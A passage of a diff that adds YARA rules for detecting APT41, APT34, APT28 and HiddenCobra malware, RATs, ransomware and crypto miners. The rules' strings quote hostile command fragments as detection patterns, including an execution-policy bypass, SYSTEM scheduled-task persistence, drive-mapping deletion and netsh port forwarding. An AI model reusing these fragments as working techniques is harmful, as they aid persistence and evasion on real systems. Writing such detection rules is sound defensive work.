+      uint16 ( 0 ) == 0x5a4d and filesize < 10000KB and ( pe.imphash ( ) == "1b074ef7a1c0888ef31337c8ad2f2e0a" or 2 of them )
+}
+
+rule APT_APT41_HIGHNOON_BIN_2_RID2E21 : APT DEMO EXE FILE G0096 MAL {
+   meta:
+      description = "Detects APT41 malware HIGHNOON.BIN"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+      date = "2019-08-07 11:01:21"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7"
+      hash2 = "c51c5bbc6f59407286276ce07f0f7ea994e76216e0abe34cbf20f1b1cbd9446d"
+      tags = "APT, DEMO, EXE, FILE, G0096, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Double\\Door_wh\\" ascii
+      $x2 = "[Stone] Config --> 2k3 TCP Positive Logout." fullword ascii
+      $x3 = "\\RbDoorX64.pdb" ascii
+      $x4 = "RbDoor, Version 1.0" fullword wide
+      $x5 = "About RbDoor" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+}
+
+rule APT_APT41_RevokedCert_Aug19_1_RID30D2 : APT DEMO EXE FILE G0096 {
+   meta:
+      description = "Detects revoked certificates used by APT41 group"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+      date = "2019-08-07 12:56:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0096"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" or pe.signatures [ i ] . serial == "63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" or pe.signatures [ i ] . serial == "01:00:00:00:00:01:30:73:85:f7:02" or pe.signatures [ i ] . serial == "14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" or pe.signatures [ i ] . serial == "7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" or pe.signatures [ i ] . serial == "53:0c:e1:4c:81:f3:62:10:a1:68:2a:ff:17:9e:25:80" or pe.signatures [ i ] . serial == "54:c6:c1:40:6f:b4:ac:b5:d2:06:74:e9:93:92:c6:3e" or pe.signatures [ i ] . serial == "fd:f2:83:7d:ac:12:b7:bb:30:ad:05:8f:99:9e:cf:00" or pe.signatures [ i ] . serial == "18:63:79:57:5a:31:46:e2:6b:ef:c9:0a:58:0d:1b:d2" or pe.signatures [ i ] . serial == "5c:2f:97:a3:1a:bc:32:b0:8c:ac:01:00:59:8f:32:f6" or pe.signatures [ i ] . serial == "4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" or pe.signatures [ i ] . serial == "58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" or pe.signatures [ i ] . serial == "47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" or pe.signatures [ i ] . serial == "30:d3:c1:67:26:5b:52:0c:b8:7f:25:84:4f:95:cb:04" or pe.signatures [ i ] . serial == "1e:52:bb:f5:c9:0e:c1:64:d0:5b:e0:e4:16:61:52:5f" or pe.signatures [ i ] . serial == "25:f8:78:22:de:56:d3:98:21:59:28:73:ea:09:ca:37" or pe.signatures [ i ] . serial == "67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d" )
+}
+
+rule SUSP_Unsigned_GoogleUpdate_RID3117 : DEMO EXE FILE HIGHVOL SUSP {
+   meta:
+      description = "Detects suspicious unsigned GoogleUpdate.exe"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-08-05 13:07:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354"
+      tags = "DEMO, EXE, FILE, HIGHVOL, SUSP"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $ac1 = { 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C
+               00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65
+               00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55
+               00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78
+               00 65 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and $ac1 and pe.number_of_signatures < 1
+}
+
+rule SUSP_DOC_LNK_in_ZIP_RID2D5D : DEMO FILE SUSP T1023 {
+   meta:
+      description = "Detects suspicious .doc.lnk file in ZIP archive"
+      author = "Florian Roth"
+      reference = "https://twitter.com/RedDrip7/status/1145877272945025029"
+      date = "2019-07-02 10:28:41"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7ea4f77cac557044e72a8e280372a2abe072f2ad98b5a4fbed4e2229e780173a"
+      tags = "DEMO, FILE, SUSP, T1023"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".doc.lnk" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and 1 of them
+}
+
+rule MAL_AveMaria_RAT_Jul19_RID2E8A : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects AveMaria RAT"
+      author = "Florian Roth"
+      reference = "https://twitter.com/abuse_ch/status/1145697917161934856"
+      date = "2019-07-01 11:18:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5a927db1566468f23803746ba0ccc9235c79ca8672b1444822631ddbf2651a59"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "operator co_await" fullword ascii
+      $s1 = "uohlyatqn" fullword ascii
+      $s2 = "index = [%d][%d][%d][%d]" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+}
+
+rule SUSP_OfficeDoc_VBA_Base64Decode_RID31DD : DEMO FILE SCRIPT SUSP T1132 {
+   meta:
+      description = "Detects suspicious VBA code with Base64 decode functions"
+      author = "Florian Roth"
+      reference = "https://github.com/cpaton/Scripting/blob/master/VBA/Base64.bas"
+      date = "2019-06-21 13:40:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc"
+      tags = "DEMO, FILE, SCRIPT, SUSP, T1132"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "B64_CHAR_DICT" ascii
+      $s2 = "Base64Decode" ascii
+      $s3 = "Base64Encode" ascii
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 60KB and 2 of them
+}
+
+rule SUSP_VBA_FileSystem_Access_RID30A9 : DEMO FILE SCRIPT SUSP {
+   meta:
+      description = "Detects suspicious VBA that writes to disk and is activated on document open"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-06-21 12:49:21"
+      score = 40
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-01-15"
+      hash1 = "52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc"
+      tags = "DEMO, FILE, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\Common Files\\Microsoft Shared\\" wide
+      $s2 = "Scripting.FileSystemObject" ascii
+      $a1 = "Document_Open" ascii
+      $a2 = "WScript.Shell" ascii
+      $a3 = "AutoOpen" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 100KB and all of ( $s* ) and 1 of ( $a* )
+}
+
+rule SUSP_XMRIG_Reference_RID2E30 : DEMO EXE FILE SUSP {
+   meta:
+      description = "Detects an executable with a suspicious XMRIG crypto miner reference"
+      author = "Florian Roth"
+      reference = "https://twitter.com/itaitevet/status/1141677424045953024"
+      date = "2019-06-20 11:03:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\xmrig\\" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+}
+
+rule MAL_XMR_Miner_May19_1_RID2E1B : DEMO EXE FILE HIGHVOL MAL {
+   meta:
+      description = "Detects Monero Crypto Coin Miner"
+      author = "Florian Roth"
+      reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+      date = "2019-05-31 11:00:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc"
+      tags = "DEMO, EXE, FILE, HIGHVOL, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "donate.ssl.xmrig.com" fullword ascii
+      $x2 = "* COMMANDS     'h' hashrate, 'p' pause, 'r' resume" fullword ascii
+      $s1 = "[%s] login error code: %d" fullword ascii
+      $s2 = "\\\\?\\pipe\\uv\\%p-%lu" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 14000KB and ( pe.imphash ( ) == "25d9618d1e16608cd5d14d8ad6e1f98e" or 1 of ( $x* ) or 2 of them )
+}
+
+rule MAL_Ramnit_May19_1_RID2D35 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Ramnit malware"
+      author = "Florian Roth"
+      reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+      date = "2019-05-31 10:22:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d7ec3fcd80b3961e5bab97015c91c843803bb915c13a4a35dfb5e9bdf556c6d3"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "500cd02578808f964519eb2c85153046"
+}
+
+rule MAL_Parite_Malware_May19_2_RID3058 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Parite malware based on Imphash"
+      author = "Florian Roth"
+      reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+      date = "2019-05-31 12:35:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c9d8852745e81f3bfc09c0a3570d018ae8298af675e3c6ee81ba5b594ff6abb8"
+      hash2 = "8d47b08504dcf694928e12a6aa372e7fa65d0d6744429e808ff8e225aefa5af2"
+      hash3 = "285e3f21dd1721af2352196628bada81050e4829fb1bb3f8757a45c221737319"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 18000KB and ( pe.imphash ( ) == "b132a2719be01a6ef87d9939d785e19e" or pe.imphash ( ) == "78f4f885323ffee9f8fa011455d0523d" )
+}
+
+rule SUSP_PDB_CN_Threat_Actor_May19_1_RID3220 : CHINA DEMO EXE FILE SUSP {
+   meta:
+      description = "Detects PDB path user name used by Chinese threat actors"
+      author = "Florian Roth"
+      reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+      date = "2019-05-31 13:51:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "01c3882e8141a25abe37bb826ab115c52fd3d109c4a1b898c0c78cee8dac94b4"
+      tags = "CHINA, DEMO, EXE, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C:\\Users\\zcg\\Desktop\\" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+}
+
+rule EXPL_Strings_CVE_POC_May19_1_RID3091 : DEMO EXE EXPLOIT FILE {
+   meta:
+      description = "Detects strings used in CVE POC noticed in May 2019"
+      author = "Florian Roth"
+      reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+      date = "2019-05-31 12:45:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "01c3882e8141a25abe37bb826ab115c52fd3d109c4a1b898c0c78cee8dac94b4"
+      tags = "DEMO, EXE, EXPLOIT, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Debug\\poc_cve_20" ascii
+      $x2 = "\\Release\\poc_cve_20" ascii
+      $x3 = "alloc fake fail: %x!" fullword ascii
+      $x4 = "Allocate fake tagWnd fail!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+}
+
+rule HKTL_CN_ProcHook_May19_1_RID2F38 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects hacktool used by Chinese threat groups"
+      author = "Florian Roth"
+      reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+      date = "2019-05-31 11:47:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "02ebdc1ff6075c15a44711ccd88be9d6d1b47607fea17bef7e5e17f8da35293e"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "343d580dd50ee724746a5c28f752b709"
+}
+
+rule MAL_QuasarRAT_May19_1_RID2E1E : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects QuasarRAT malware"
+      author = "Florian Roth"
+      reference = "https://blog.ensilo.com/uncovering-new-activity-by-apt10"
+      date = "2019-05-27 11:00:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Quasar.Common.Messages" ascii fullword
+      $x2 = "Client.MimikatzTools" ascii fullword
+      $x3 = "Resources.powerkatz_x86.dll" ascii fullword
+      $x4 = "Uninstalling... good bye :-(" wide
+      $xc1 = { 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00
+               68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00
+               63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00
+               74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00
+               73 } 
+      $xc2 = { 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20
+               00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C
+               00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E
+               00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20
+               00 2F 00 61 00 20 00 2F 00 71 00 20 00 2F 00 66
+               00 20 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 10000KB and 1 of them
+}
+
+rule HKTL_LNX_Pnscan_RID2C57 : DEMO HKTL LINUX T1046 {
+   meta:
+      description = "Detects Pnscan port scanner"
+      author = "Florian Roth"
+      reference = "https://github.com/ptrrkssn/pnscan"
+      date = "2019-05-27 09:45:01"
+      score = 55
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, LINUX, T1046"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "-R<hex list>   Hex coded response string to look for." fullword ascii
+      $x2 = "This program implements a multithreaded TCP port scanner." ascii wide
+   condition: 
+      filesize < 6000KB and 1 of them
+}
+
+rule APT_ATP28_Sofacy_Indicators_May19_1_RID3357 : APT DEMO EXE FILE G0007 RUSSIA {
+   meta:
+      description = "Detects APT28 Sofacy indicators in samples"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1129647994603790338"
+      date = "2019-05-18 14:43:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "80548416ffb3d156d3ad332718ed322ef54b8e7b2cc77a7c5457af57f51d987a"
+      hash2 = "b40909ac0b70b7bd82465dfc7761a6b4e0df55b894dd42290e3f72cb4280fa44"
+      tags = "APT, DEMO, EXE, FILE, G0007, RUSSIA"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "c:\\Users\\user\\Desktop\\openssl-1.0.1e_m\\/ssl/cert.pem" ascii
+      $x2 = "C:\\Users\\User\\Desktop\\Downloader_Poco" ascii
+      $s1 = "w%SystemRoot%\\System32\\npmproxy.dll" fullword wide
+      $op0 = { e8 41 37 f6 ff 48 2b e0 e8 99 ff ff ff 48 8b d0 } 
+      $op1 = { e9 34 3c e3 ff cc cc cc cc 48 8d 8a 20 } 
+      $op2 = { e8 af bb ef ff b8 ff ff ff ff e9 f4 01 00 00 8b } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 10000KB and ( pe.imphash ( ) == "f4e1c3aaec90d5dfa23c04da75ac9501" or 1 of ( $x* ) or ( $s1 and 2 of ( $op* ) ) )
+}
+
+rule MAL_RANSOM_RobinHood_May19_1_RID307D : CRIME DEMO EXE FILE MAL RANSOM {
+   meta:
+      description = "Detects RobinHood Ransomware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/BThurstonCPTECH/status/1128489465327030277"
+      date = "2019-05-15 12:42:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "21cb84fc7b33e8e31364ff0e58b078db8f47494a239dc3ccbea8017ff60807e3"
+      tags = "CRIME, DEMO, EXE, FILE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".enc_robbinhood" ascii
+      $s2 = "c:\\windows\\temp\\pub.key" ascii fullword
+      $s3 = "cmd.exe /c net use * /DELETE /Y" ascii
+      $s4 = "sc.exe stop SQLAgent$SQLEXPRESS" nocase
+      $s5 = "main.EnableShadowFucks" nocase
+      $s6 = "main.EnableRecoveryFCK" nocase
+      $s7 = "main.EnableLogLaunders" nocase
+      $s8 = "main.EnableServiceFuck" nocase
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
+}
+
+rule SUSP_Base64_Encoded_Hex_Encoded_Code_RID3420 : DEMO SUSP T1132 {
+   meta:
+      description = "Detects hex encoded code that has been base64 encoded"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-04-29 15:17:11"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      type = "file"
+      tags = "DEMO, SUSP, T1132"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = { 78 34 4e ?? ?? 63 65 44 ?? ?? 58 48 67 } 
+      $x2 = { 63 45 44 ?? ?? 58 48 67 ?? ?? ?? 78 34 4e } 
+      $fp1 = "Microsoft Azure Code Signp$" 
+   condition: 
+      1 of ( $x* ) and not 1 of ( $fp* )
+}
+
+rule SUSP_DropperBackdoor_Keywords_RID3273 : DEMO EXE FILE MAL SUSP {
+   meta:
+      description = "Detects suspicious keywords that indicate a backdoor"
+      author = "Florian Roth"
+      reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+      date = "2019-04-24 14:05:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5"
+      tags = "DEMO, EXE, FILE, MAL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x4 = "DropperBackdoor" fullword wide ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+}
+
+rule APT_DNSpionage_Karkoff_Malware_Apr19_1_RID34E4 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects DNSpionage Karkoff malware"
+      author = "Florian Roth"
+      reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+      date = "2019-04-24 15:49:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11"
+      hash2 = "b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04"
+      hash3 = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Karkoff.exe" fullword wide
+      $x2 = "kuternull.com" fullword wide
+      $x3 = "rimrun.com" fullword wide
+      $s1 = "C:\\Windows\\Temp\\" wide
+      $s2 = "CMD.exe" fullword wide
+      $s3 = "get_ProcessExtensionDataNames" fullword ascii
+      $s4 = "get_ProcessDictionaryKeys" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or all of ( $s* ) )
+}
+
+rule SUSP_Netsh_PortProxy_Command_RID3201 : DEMO SUSP T1016 {
+   meta:
+      description = "Detects a suspicious command line with netsh and the portproxy command"
+      author = "Florian Roth"
+      reference = "https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy"
+      date = "2019-04-20 13:46:41"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09"
+      tags = "DEMO, SUSP, T1016"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "netsh interface portproxy add v4tov4 listenport=" ascii
+   condition: 
+      1 of them
+}
+
+rule APT_APT34_PS_Malware_Apr19_1_RID3047 : APT DEMO G0049 G0057 MAL MIDDLE_EAST SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects APT34 PowerShell malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
+      date = "2019-04-17 12:33:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768"
+      tags = "APT, DEMO, G0049, G0057, MAL, MIDDLE_EAST, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "= get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID" ascii
+      $x2 = "Write-Host \"excepton occured!\"" ascii
+      $s1 = "Start-Sleep -s 1;" fullword ascii
+      $s2 = "Start-Sleep -m 100;" fullword ascii
+   condition: 
+      1 of ( $x* ) or 2 of them
+}
+
+rule APT_APT34_PS_Malware_Apr19_2_RID3048 : APT DEMO G0049 G0057 MAL MIDDLE_EAST SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects APT34 PowerShell malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
+      date = "2019-04-17 12:33:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459"
+      tags = "APT, DEMO, G0049, G0057, MAL, MIDDLE_EAST, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "= \"http://\" + [System.Net.Dns]::GetHostAddresses(\"" ascii
+      $x2 = "$t = get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID" fullword ascii
+      $x3 = "| Where { $_ -notmatch '^\\s+$' }" ascii
+      $s1 = "= new-object System.Net.WebProxy($u, $true);" fullword ascii
+      $s2 = " -eq \"dom\"){$" ascii
+      $s3 = " -eq \"srv\"){$" ascii
+      $s4 = "+\"<>\" | Set-Content" ascii
+   condition: 
+      1 of ( $x* ) and 3 of them
+}
+
+rule APT_APT34_PS_Malware_Apr19_3_RID3049 : APT DEMO G0049 G0057 MAL MIDDLE_EAST SCRIPT T1053 T1059_001 T1086 {
+   meta:
+      description = "Detects APT34 PowerShell malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
+      date = "2019-04-17 12:33:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed"
+      tags = "APT, DEMO, G0049, G0057, MAL, MIDDLE_EAST, SCRIPT, T1053, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Powershell.exe -exec bypass -file ${global:$address1}" 
+      $x2 = "schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn" 
+      $x3 = "\"\\UpdateTasks\\UpdateTaskHosts\"" 
+      $x4 = "wscript /b \\`\"${global:$address1" ascii
+      $x5 = "::FromBase64String([string]${global:$http_ag}))" ascii
+      $x6 = ".run command1, 0, false\" | Out-File " ascii
+      $x7 = "\\UpdateTask.vbs" ascii
+      $x8 = "hUpdater.ps1" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_1_RID33F3 : APT DEMO G0032 MAL NK {
+   meta:
+      description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
+      date = "2019-04-13 15:09:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d77fdabe17cdba62a8e728cbe6c740e2c2e541072501f77988674e07a05dfb39"
+      tags = "APT, DEMO, G0032, MAL, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "www.naver.com" fullword ascii
+      $s2 = "PolarSSL Test CA0" fullword ascii
+   condition: 
+      filesize < 1000KB and all of them
+}
+
+rule APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3_RID33F5 : APT DEMO EXE FILE G0032 MAL NK {
+   meta:
+      description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
+      date = "2019-04-13 15:10:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525"
+      hash2 = "05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461"
+      hash3 = "ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d"
+      tags = "APT, DEMO, EXE, FILE, G0032, MAL, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Oleaut32.dll" fullword ascii
+      $s2 = "Process32NextA" fullword ascii
+      $s3 = "Process32FirstA" fullword ascii
+      $s4 = "%sRSA key size  : %d bits" fullword ascii
+      $s5 = "emailAddress=" fullword ascii
+      $s6 = "%scert. version : %d" fullword ascii
+      $s7 = "www.naver.com" fullword ascii
+      $x1 = "ztretrtireotreotieroptkierert" fullword ascii
+      $x2 = "reykfgkodfgkfdskgdfogpdokgsdfpg" fullword ascii
+      $x3 = "fjiejffndxklfsdkfjsaadiepwn" fullword ascii
+      $x4 = "fgwljusjpdjah" fullword ascii
+      $x5 = "udbcgiut.dat" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or 6 of ( $s* ) )
+}
+
+rule MAL_Ransomware_Wadhrama_RID2FED : CRIME DEMO EXE FILE MAL RANSOM {
+   meta:
+      description = "Detects Wadhrama Ransomware via Imphash"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-04-07 12:18:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "557c68e38dce7ea10622763c10a1b9f853c236b3291cd4f9b32723e8714e5576"
+      tags = "CRIME, DEMO, EXE, FILE, MAL, RANSOM"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
